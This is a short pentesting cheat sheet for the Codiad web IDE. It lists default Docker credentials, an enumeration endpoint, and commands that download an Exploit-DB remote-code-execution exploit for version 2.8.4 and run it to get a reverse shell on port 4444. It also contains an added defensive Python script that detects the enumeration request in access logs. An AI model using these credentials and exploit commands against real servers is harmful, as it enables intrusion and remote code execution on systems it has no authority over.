# Codiad Pentesting

Codiad is a web-based IDE framework.

### Default Credentials

```
# Docker image (format is username:password) - https://hub.docker.com/r/bitnami/codiad
user:bitnami
```

### Enumeration

```
# Returns the current project directory on the server (path is relative to the Codiad base URL)
/components/project/controller.php?action=get_current
```
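
To spot this enumeration request from the defender's side, the following added example (not part of the original page or of Codiad) scans web server access logs for hits on the endpoint above and groups them by client IP. It assumes the Apache/nginx "combined" log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed "combined" log format: only client IP, request line and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

ENDPOINT = "/components/project/controller.php"  # path taken from the page

def is_get_current_probe(target):
    """True if the request target hits the project controller with action=get_current."""
    parts = urlsplit(target)
    # Decode percent-escapes, collapse duplicate slashes and lower-case the path
    # so trivially altered spellings of the same path are still matched.
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if not path.endswith(ENDPOINT):
        return False
    # parse_qs percent-decodes values and copes with any parameter order.
    actions = parse_qs(parts.query, keep_blank_values=True).get("action", [])
    return any(a.strip().lower() == "get_current" for a in actions)

def find_probes(lines):
    """Return {client_ip: [(status, target), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_get_current_probe(m["target"]):
            hits[m["ip"]].append((int(m["status"]), m["target"]))
    return dict(hits)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /components/project/controller.php?action=get_current HTTP/1.1" 200 41 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /codiad//components/project/controller.php?x=1&action=get%5Fcurrent HTTP/1.1" 200 41 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Mar/2024:10:00:05 +0000] "GET /components/project/controller.php?action=something_else HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reqs in find_probes(SAMPLE_LOG).items():
        print(ip, len(reqs), sorted({status for status, _ in reqs}))
```

Requests to this endpoint may also come from the IDE's own front end during normal use (an assumption about Codiad's behaviour), so review hits from unexpected client addresses or without a preceding login rather than alerting on every match.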

### Remote Code Execution (RCE) v2.8.4

```
wget https://www.exploit-db.com/exploits/49705 -O exploit.py

# Linux
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 linux
# Windows
python3 exploit.py https://example.com/ admin admin <local-ip> 4444 windows
```

### References

* [Exploit DB](https://www.exploit-db.com/exploits/49705)
